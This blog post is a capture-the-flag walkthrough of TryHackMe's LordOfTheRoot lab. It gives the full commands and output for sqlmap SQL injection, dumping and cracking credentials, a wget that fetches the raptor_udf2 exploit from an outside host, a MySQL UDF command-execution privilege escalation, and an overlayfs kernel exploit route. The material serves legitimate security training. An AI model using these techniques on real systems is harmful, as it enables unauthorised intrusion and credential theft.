thm-lordoftheroot-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play  Tryhackme’s lordoftheroot at

https://tryhackme.com/room/lordoftheroot

This room can be found on TryHackMe! You will need a subscription to complete this room.


#1 Do your basic reconnaissance. What ports do you see open?
#2 Hmmm, what method is used to reveal hidden ports?
#3 What port is the hidden service on?
#4 Do recon on the hidden service.
#5 Can you some how obtain user credentials
#6 Whats the method to exploit the system for privilege escalation called?
#7 Who wrote the message in the flag message in the roots home directory?

Enumeration

E:\PENTEST>nmap -p 1-65535 10.10.31.146
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-15 10:20 W. Europe Summer Time
Stats: 0:00:20 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 28.11% done; ETC: 10:20 (0:00:13 remaining)
Nmap scan report for 10.10.31.146
Host is up (0.033s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
1337/tcp open waste

Nmap done: 1 IP address (1 host up) scanned in 28.87 seconds

###Service Enumeration

PORT SERVICE VERSION DETECTION
TCP: 22 SSH OpenSSH 6.6.1p1 Ubuntu
TCP: 1337 HTTP Apache/2.4.7 (Ubuntu)

###HTTP Enumeration

Viewing any 404 page rendered:

base64 image

Inspection of the page source revealed a base64 encoded string, encoded within another string:

 
[root:~]# echo "THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh" | base64 -d
Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!#
[root:~]# echo "Lzk3ODM0NTIxMC9pbmRleC5waHA=" | base64 -d
/978345210/index.php#

The above URL exposed a web form, vulnerable to SQL injection.

SQLMAP

The following SQLMap commands were leveraged during the SQL enumeration and SQL injection database dumping.

1st we use Burp to intercept the login request , and save it as mordor.txt

c:\SQLMAP>type mordor.txt
POST /978345210/index.php HTTP/1.1
Host: 10.10.31.146:1337
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://10.10.31.146:1337
Connection: close
Referer: http://10.10.31.146:1337/978345210/index.php
Cookie: PHPSESSID=epttkhiinqkf5ai8ognr1pbvu0
Upgrade-Insecure-Requests: 1

username=admin&password=123456&submit=+Login+
c:\SQLMAP>
c:\SQLMAP>python sqlmap.py -r mordor.txt --batch --dump --threads 10 --batch
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.11.19#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:32:10 /2020-07-15/

[09:32:10] [INFO] parsing HTTP request from 'mordor.txt'
it appears that provided value for POST parameter 'submit' has boundaries. Do you want to inject inside? (' Login* ') [y/N] N
[09:32:11] [INFO] resuming back-end DBMS 'mysql'
[09:32:11] [INFO] testing connection to the target URL
[09:32:11] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://10.10.31.146:1337/978345210/profile.php'. Do you want to follow? [Y/n] Y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: username=admin'||(SELECT 0x63724e64 FROM DUAL WHERE 2429=2429 AND SLEEP(5))||'&password=123456&submit= Login
---
[09:32:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
[09:32:11] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:32:11] [INFO] fetching current database
[09:32:11] [INFO] resumed: Webapp
[09:32:11] [INFO] fetching tables for database: 'Webapp'
[09:32:11] [INFO] fetching number of tables for database 'Webapp'
[09:32:11] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[09:32:11] [WARNING] time-based comparison requires larger statistical model, please wait..............................  (done)
[09:32:14] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
1
[09:32:40] [INFO] retrieved:

[09:33:30] [INFO] adjusting time delay to 1 second due to good response times
Users
[09:34:39] [INFO] fetching columns for table 'Users' in database 'Webapp'
[09:34:39] [INFO] retrieved: 3
[09:34:55] [INFO] retrieved: id
[09:35:27] [INFO] retrieved: username
[09:37:23] [INFO] retrieved: password
[09:39:45] [INFO] fetching entries for table 'Users' in database 'Webapp'
[09:39:45] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[09:39:45] [INFO] retrieved: 5
[09:39:56] [WARNING] (case) time-based comparison requires reset of statistical model, please wait..............................  (done)
1
[09:40:10] [INFO] retrieved: iwilltakethering
[09:44:28] [INFO] retrieved: frodo
[09:46:02] [INFO] retrieved: 2
[09:46:19] [INFO] retrieved: MyPreciousR00t
[09:50:26] [INFO] retrieved: smeagol
[09:52:16] [INFO] retrieved: 3
[09:52:32] [INFO] retrieved: AndMySword
[09:55:46] [INFO] retrieved: aragorn
[09:57:32] [INFO] retrieved: 4
[09:57:53] [INFO] retrieved: AndMyBow
[10:00:35] [INFO] retrieved: legolas
[10:02:32] [INFO] retrieved: 5
[10:02:48] [INFO] retrieved: AndMyAxe
[10:05:21] [INFO] retrieved: gimli
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

[10:06:40] [INFO] table 'Webapp.Users' dumped to CSV file 'C:\Users\jacco\.sqlmap\output\10.10.31.146\dump\Webapp\Users.csv'
[10:06:40] [INFO] fetched data logged to text files under 'C:\Users\jacco\.sqlmap\output\10.10.31.146'

[*] ending @ 10:06:40 /2020-07-15/


c:\SQLMAP>

 

SQLMap Enumerate Databases

# sqlmap -o -u http://192.168.30.140:1337/978345210/index.php --forms --dbs

SQLMap Database Dump

available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp

SQLMap Database Table Enumeration

sqlmap -o -u http://192.168.30.140:1337/978345210/index.php --forms -D Webapp
--tables
Database: Webapp
[1 table]
+-------+
| Users |
+-------+

SQLMap Enumerate Columns

 
sqlmap -o -u http://192.168.30.140:1337/978345210/index.php --forms -D Webapp
-T Users --columns
Database: Webapp
Table: Users
[3 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(10)      |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+

SQLMap Dump Passwords

 
sqlmap -o -u http://192.168.30.140:1337/978345210/index.php --forms -D Webapp
-T Users -C id,username,password --dump
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

SQLMap Dump MySQL DB and crack hashes

sqlmap -o -u http://192.168.30.140:1337/978345210/index.php --forms -D mysql -T
user -C User,Password --dump

SQLMap hash cracking options

do you want to store hashes to a temporary file for eventual further processing
with other tools [y/N] y
[05:03:45] [INFO] writing hashes to a temporary file
'/tmp/sqlmapLg7tgv31954/sqlmaphashes-s2BIJH.txt' 
do you want to crack them via a dictionary-based attack? [y/N/q] y
[05:04:28] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 
[05:04:38] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[05:04:43] [INFO] starting dictionary-based cracking (mysql_passwd)
[05:04:43] [INFO] starting 4 processes 
[05:04:46] [INFO] cracked password 'darkshadow' for hash
'*4dd56158acdba81bfe3ff9d3d7375231596ce10f' 
Database: mysql
Table: user
[5 entries]
+------------------+--------------------------------------------------------+
| User             | Password                                               |
+------------------+--------------------------------------------------------+
| debian-sys-maint | *A55A9B9049F69BC2768C9284615361DFBD580B34              |
| root             | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F (darkshadow) |
| root             | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F (darkshadow) |
| root             | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F (darkshadow) |
| root             | *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F (darkshadow) |
+------------------+--------------------------------------------------------+

MySQL Local Privilege Escalation

smeagol@LordOfTheRoot:~$ wget 0xdeadbeef.info/exploits/raptor_udf2.c
--2015-11-24 00:55:17--  http://0xdeadbeef.info/exploits/raptor_udf2.c
Resolving 0xdeadbeef.info (0xdeadbeef.info)... 213.254.16.4
Connecting to 0xdeadbeef.info (0xdeadbeef.info)|213.254.16.4|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3178 (3.1K) [text/x-csrc]
Saving to: ‘raptor_udf2.c’

100%[================================================================================================================================>]
3,178       --.-K/s   in 0.02s   

2015-11-24 00:55:18 (203 KB/s) - ‘raptor_udf2.c’ saved [3178/3178]

smeagol@LordOfTheRoot:~$ gcc -g -c raptor_udf2.c
smeagol@LordOfTheRoot:~$ gcc -g -shared -W1,-soname,raptor_udf2.so -o
raptor_udf2.so raptor_udf2.o -lc
gcc: error: unrecognized command line option ‘-W1,-soname,raptor_udf2.so’
smeagol@LordOfTheRoot:~$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o
raptor_udf2.so raptor_udf2.o -lc
smeagol@LordOfTheRoot:~$ mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password:
NO)
smeagol@LordOfTheRoot:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2193
Server version: 5.5.44-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2015, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> create table foo(line blob);
ERROR 1050 (42S01): Table 'foo' already exists
mysql> insert into foo values(load_file('/home/smeagol/raptor_udf2.so'));
Query OK, 1 row affected (0.01 sec)

mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
ERROR 1086 (HY000): File '/usr/lib/mysql/plugin/raptor_udf2.so' already exists
mysql> create function do_system returns integer soname 'raptor_udf2.so';
Query OK, 0 rows affected (0.00 sec)

mysql> select * from mysql.func;
+-----------+-----+----------------+----------+
| name      | ret | dl             | type     |
+-----------+-----+----------------+----------+
| do_system |   2 | raptor_udf2.so | function |
+-----------+-----+----------------+----------+
1 row in set (0.00 sec)

mysql> select do_system('echo "root:passwd" | chpasswd > /tmp/out; chown
smeagol.smeagol /tmp/out');
+---------------------------------------------------------------------------------------+
| do_system('echo "root:passwd" | chpasswd > /tmp/out; chown smeagol.smeagol
/tmp/out') |
+---------------------------------------------------------------------------------------+
|
0 |
+---------------------------------------------------------------------------------------+
1 row in set (0.02 sec)

mysql> exit
Bye

Root

 
smeagol@LordOfTheRoot:~$ su -
Password: 
root@LordOfTheRoot:~# whoami 
root
root@LordOfTheRoot:~# id
uid=0(root) gid=0(root) groups=0(root)

Root Flag

 
root@LordOfTheRoot:~# cat /root/Flag.txt 
“There is only one Lord of the Ring, only one who can bend it to his will. And
he does not share power.”
– Gandalf

Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) – ‘overlayfs’ Local Privilege Escalation

On the victims machine, navigate to the /tmp folder and run the command:

wget http://<your vpn IP>:8000/linpeas.sh

This should transfer over the linpeas script and allow you to run it.

chmod +x linpeas.sh

./linpeas.sh

Linpeas will run and immediately and find some potential privilege escalation factors.

TryHackMe want’s you to exploit it using a buffer overflow attack but I am going to show you how to get root without doing that.

SQLMAP tells us that this machine is running Ubuntu 14.04.3 and google tells us that there is a privilege escalation exploit for that system.

Download this exploit into your computer  from https://www.exploit-db.com/exploits/39166 and once again fire up that python http sever like we did before to download it to the victims machine and run the exploit.

Just like that you have escalated your privilege and are now root. Navigate to /root directory to capture the flag!\

Author – Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *